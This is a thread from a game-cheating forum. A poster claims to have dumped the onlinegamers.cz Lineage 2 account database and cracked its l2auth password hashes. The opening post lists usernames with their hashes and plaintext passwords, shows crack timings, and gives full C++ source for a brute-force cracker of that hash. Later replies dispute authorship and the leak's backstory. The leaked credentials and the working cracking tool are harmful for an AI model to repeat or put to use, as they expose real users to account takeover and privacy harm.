Jump to content
MaxCheaters Official Group on Discord
-> Place your ad text here <-
We're Rebuilding – Join Our Staff Team

Onlinegamers.cz - Password of PTS cracked

SnoopedMan

By SnoopedMan
in Hacks & Cheats [English]

 Share

Recommended Posts

SnoopedMan Newbie

SnoopedMan

Posted
Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely), small example:

 

yurii2 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii3 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii4 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

Yuriik : 0xC9D81E75C8EDBE4075ECCACA079DBBBB : vanecka

Yurii : 0xC9D81E75C8EDBE4075ECCACA079DBBBB  vanecka

yurikhan : 0xB539DD269BFD93BE8B123434F9634545 : peter7Y0

yuriko : 0x357A6689B817C47742DBFDFD30AA8C8C : 081p87

Yuri Prime : 0xA52FDE10AD94E98EBB220404C9537575 : litaon

Yuris : 0xA9A0BA5EE764ADA108318127EA705656 : fatimapP13

Yury : 0x25689971CCB29ACDF86147478A103636 : madcji

Yuske : 0xB5B1EDD4696C10A499228B8A47DDFBFB : dfabsf7hw

yusuf : 0x35C266BA03B8D0862FEADAA06DF7D1D1 : AbCbmfKA19N

yusuke : 0xA507789726A97ABBAA748D60AD371111 : lucayd3<eii

 

It's easy cause that hash is CRAP and has looooooooot of collisions...

 

./crack

0xC9D81E75C8EDBE4075ECCACA079DBBBB

vanecka (0xC9D81E75C8EDBE4075ECCACA079DBBBB)

0xC9D81E75C8EDBE4075ECCACA079DBBBB vanecka (took 0 seconds)

0xB539DD269BFD93BE8B123434F9634545

peter7Y0 (0xB539DD269BFD93BE8B123434F9634545)

0xB539DD269BFD93BE8B123434F9634545 peter7Y0 (took 3 seconds)

0x35C266BA03B8D0862FEADAA06DF7D1D1

AbCbmfKA19N (0x35C266BA03B8D0862FEADAA06DF7D1D1)

0x35C266BA03B8D0862FEADAA06DF7D1D1 AbCbmfKA19N (took 3 seconds)

 

 

What do you say to those times? :)

 

 

And it's really easy:

 

#include <map>
#include <fstream>
#include <vector>
#include <iostream>
#include <string>
#include <math.h>
#include <string.h>

std::string encrypt(const std::string &plain)
{
    const static double arrayMul[4] = {213119, 213247, 213203, 213821};
    const static double arrayAdd[4] = {2529077, 2529089, 2529589, 2529997};
    unsigned char dst[16];
    unsigned char key[16];
    memset(dst, 0, 16);
    memset(key, 0, 16);
    double val[4];
    memset(val, 0, sizeof(float)*4);

    for (size_t i(0) ; i < 16 ; ++i) {
        if (plain.size() > i) {
            dst[i] = static_cast<unsigned char>(plain[i]);
            key[i] = static_cast<unsigned char>(plain[i]);
        } else {
            dst[i] = 0;
            key[i] = 0;
        }
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        double x(key[i*4]);
        x += key[i*4+1] << 8;
        x += key[i*4+2] << 16;
        x += key[i*4+3] << 24;
        x *= arrayMul[i];
        x += arrayAdd[i];
        val[i] = fmod(x, 4294967296.0);
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        key[i*4+0] = static_cast<uint32_t>(val[i]) & 0xff;
        key[i*4+1] = static_cast<uint32_t>(val[i] / 0x100) & 0xff;
        key[i*4+2] = static_cast<uint32_t>(val[i] / 0x10000) & 0xff;
        key[i*4+3] = static_cast<uint32_t>(val[i] / 0x1000000) & 0xff;
    }

    dst[0] ^= key[0];
    for (size_t i(1) ; i < 16 ; ++i) {
        dst[i] = dst[i] ^ dst[i-1] ^ key[i];
    }

    for (size_t i(0) ; i < 16 ; ++i) {
        if (!dst[i]) {
            dst[i] = 0x66;
        }
    }

    std::string result("0x");
    for (size_t i(0) ; i < 16 ; ++i) {
        char x[3];
        sprintf(x, "%02X", dst[i]);
        result += x;
    }

    return result;
}

std::string tryPassword(const std::string &hash,
                        const std::string &chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
                        const std::string &possibility = std::string())
{
    std::string result;
    size_t j(possibility.size());
    for (size_t i(0) ; i < chars.size() ; ++i) {
        std::string s(possibility);
        s.push_back(chars[i]);
        std::string enc(encrypt(s));
        // std::cerr << "Trying " << s << std::endl; // comment out to see what we're trying
        if (enc.substr(0, 2+j*2) == hash.substr(0, 2+j*2)) {
            if (enc == hash) {
                std::cerr << s << " (" << enc << ")" << std::endl;
                return s; // comment out to write out all possible passwords xD
            }
            std::string res(tryPassword(hash, chars, s));
            if (!res.empty()) {
                return res;
            }
        }
    }
    return "";
}

int main(int argc, char **argv)
{
    std::map<std::string, std::string> crackMap;
    std::istream *ifs;
    if (argc != 1) {
        ifs = new std::ifstream(argv[1]);
    } else {
        ifs = &std::cin;
    }

    for (;;) {
        if (ifs->eof()) {
            break;
        }

        std::string line;
        getline(*ifs, line);
        if (line.size() == 34) {
            std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(line));
            if (icrackMap != crackMap.end()) {
                std::cout << line << " " << icrackMap->second << " (from cache)" << std::endl;
                continue;
            }
            time_t t(time(0));
            std::string password(tryPassword(line));
            if (!password.empty()) {
                crackMap.insert(std::make_pair(line, password));
                int seconds(time(0) - t);
                if (seconds < 60) {
                    std::cout << line << " " << password << " (took " << seconds << " seconds)" << std::endl;
                } else if (seconds % 60) {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes and " << (seconds % 60) << " seconds)" << std::endl;
                } else {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes" << std::endl;
                }
            }
        } else {
            size_t offset(line.find(":"));
            if (offset != std::string::npos) {
                std::string hash(line.substr(offset+1));
                std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(hash));
                if (icrackMap != crackMap.end()) {
                    std::cout << line.substr(0, offset) << ":" << icrackMap->second << std::endl;
                    continue;
                }
                std::string password(tryPassword(hash));
                crackMap.insert(std::make_pair(hash, password));
                if (!password.empty()) {
                    std::cout << line.substr(0, offset) << ":" << password << std::endl;
                }
            } else if (!line.empty()) {
                std::cout << line << " " << encrypt(line) << std::endl;
            }
        }
    }

    return 0;
}

So we advise everybody out there using l2auth to switch to MD5 (there are some files needed on postpacific.com)

 

 

ulipispirus Newbie

ulipispirus

Posted
Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely)

 

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

 

Trust me, that ist not copy/past... i developed it by myself...

 

The code is generic for all PTS login servers with small changes.

So SnoopedMan is cheater on forum, not in game.

SnoopedMan Newbie

SnoopedMan

Posted
  • Author
Posted

So you think that everyone was able to crack those hashes? Generic code is only the function std::string encrypt(const std::string &plain).. The rest is my code and it was released just here and on EPVP, but they've deleted it there.

ulipispirus Newbie

ulipispirus

Posted
Posted

Function std::string encrypt(const std::string &plain) is from PTS.

Rest is my code.

 

You know "magic numbers" in encoder, so you knows magic numbers in decoder, like: substr(0, 2+j*2)...

 

It is mistery? What if you don't know magic numbers in encoder?

Anything universal for C4 or others?

 

QQ Not your code.

cyperex Newbie

cyperex

Posted
Posted

Good job ! Hackers are getting better and better everyday while the developers can't even think why this happends! ^^

 

Lol, if we dont get worst, were bound to get much better!

 

Good post, your on your way buddy.

SnoopedMan Newbie

SnoopedMan

Posted
  • Author
Posted

 

OMG

You need encoder to check whether hash you generated starts with right chars.. that hash is crap, cause you can go char-by-char and check just the first 1 byte, first 2 bytes, first 3 bytes, ...

It's really not a cryptographic hash...

 

And substr(0, 2+j*2) means substring of that hash, 2+ because it starts with "0x", that we ignore and j*2 because that hash is encoded in hex to be human-readable...

 

Try to comprehend my code and then write your stupid posts xD

pandas Newbie

pandas

Posted
Posted

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

Well, it's a little bit more complicated than it is usually presented by people.

First of all, poker10 wasn't fired. Nearly everyone from the "old" Lineage 2 team left at the end of November 08 after several disagreements with Rod, OG president in that time. Some of us (including me and poker10) stayed and helped to keep the game environment running for several weeks, but we were no longer members of the team. We, unluckily, also tried to give the new team some "advices", as they were quite new on their positions, but as both sides were a little bit stubborn, it only led to other disagreements. As poker10 was more offensive for the taste of new team, the major "blame" was laid on his head. And, thanks to "slightly inadequate" behaviour of martinus and some other members, the legend of "poker10 fired from OG" was born.

 

Hope this helps the legend to die.

 

Best regards,

Jan "Pandas" Smitka

Onlinegamers.cz, o.s. Lineage 2 ex-head-admin

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing


  • Posts

    • Tryskell
      How to start learning Java using Lineage 2 as an example?

      By Tryskell · Posted

      First, don't really follow the "main voice", moreover if you consider it an hobby. Simply do what you want, you got only one life so use it as you want. If you make it an hobby, it's exactly like piano, or velo - only practice makes you better.   Secondly, how do you learn things ? It's actually a really important question, since some can simply be scholar, read books (theory) then practice ; and some simply can't read books. I'm the second type, I hated school, I find it boring - my knowledge in Java comes from try-and-fail. You improve your coding style every year or so, I can myself rewrite my own code (which I already considered top-notched) after a while. You always learn something new - even if Java barely evolves. L2J is a fun way to learn programming, it's a giant sandbox where you can edit anything, and I believe it should be taken as it.   My own way of learning was as follow : Add existing customs, no matter what they are : the point is to know main classes used by L2J / customs. L2J is barely Java knowledge ; the true knowledge is to know WHAT to search in WHICH location (what I call, organization). You have to understand than EVERYTHING you think already exists, in a form on another, in the source code. A custom is only the association of the different mechanisms you found "here and there", glued together in a proper goal. Once you know main classes to edit, and the customs you added are compiling fine, the main point is to know WHAT exactly you DID. Try to understand WHY and WHERE you actually copied the code. Third point would be to MANIPULATE the customs you added in order to fit your wish. First edit little values, then logic conditions ; eventually add a new Config, or a new functionality to the custom. Fourth point would be to begin to craft your own ideas. Once again, EVERYTHING already exists, in a form or another. You want a cycled event ? You got Seven Signs main task as exemple. Npc ? Search any type of Npc and figure out what it does. Fifth point would be to understand Java - mostly containers (WHAT and WHERE to use them), variables types and main Java mechanisms (inheritance, static modifier, etc). You should also begin to cut your code into maintainable classes or methods. Java can actually run without optimization, but bigger your ideas, more optimized and well-thought it should be. It's direct saved time in the future, and you would thank yourself doing so. Main tips : ALWAYS use any type of versioning system - GIT or SVN. It allows to save your work, step by step and eventually revert back anytime you want if you terribly messed up. L2J is 80% organization knowledge, and 20% Java knowledge. Basically, if you know WHAT and WHERE to search, if you aren't dumb, it's easy to replicate and re-use things. Cherry on top is to use a already good coded pack to avoid copy-paste crap and get bad habits. Avoid any type of russian or brazilian packs, for exemple - their best ability is to leak someone's else code. Obviously you need some default sense of logic, but Java and programming in general help you to improve it.   Finally, most of your questions could be solved joining related Discord (at least for aCis, I can't speak for others) - from the moment your question was correctly asked (and you seemed to search for the answer). My community (and myself) welcomes newbies, but got some issues with noobies.   The simpliest is to try, fail and repeat until you succeed - it sounds stupid, but that's basically how life works.   PS : about Java ressources, before ChatGPT, it was mostly about stackoverflow website, and site like Baeldung's one. With ChatGPT and alike, you generally double-cross AI output to avoid fucked up answers. Also, care about AI, they are often hallucinating really hard, even today. They can give you complete wrong answer, you tell them they are wrong, and they say "indeed, I suck, sorry - here's a new fucked up answer". You shouldn't 100% rely over AI answer, even if that can give sometimes legit answers, full code or just skeletons of ideas.   PPS : I don't think there are reliable ressources regarding L2J itself, also most of the proposed code decays pretty fast if the source code is actually maintained (at least for aCis). Still, old coded customs for old aCis sources are actually a good beginner challenge to apply on latest source.
    • Atom
      L2 Reborn x1 Origins

      By Atom · Posted

      Add prices please.
    • Guzman
      L2 Reborn x1 Origins

      By Guzman · Posted

      WTS: - AQ - Baium - Zaken  - Frintezza - Vesper Fighter Focus Fire Element   pm for detalis
    • Nury Mykael
      Anakim Outfit Appearance [H5/interlude]

      By Nury Mykael · Posted

      Any chance to get a  working link?
    • Advertising
      WTS/WTB L2REBORN TOP PRICE

      By Advertising · Posted

      We have the best price! L2Reborn.org Signature x1 Franz NEW!! 1KK = $20 HURRY TO BUY AT THE TOP PRICE discord - adver745645

  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock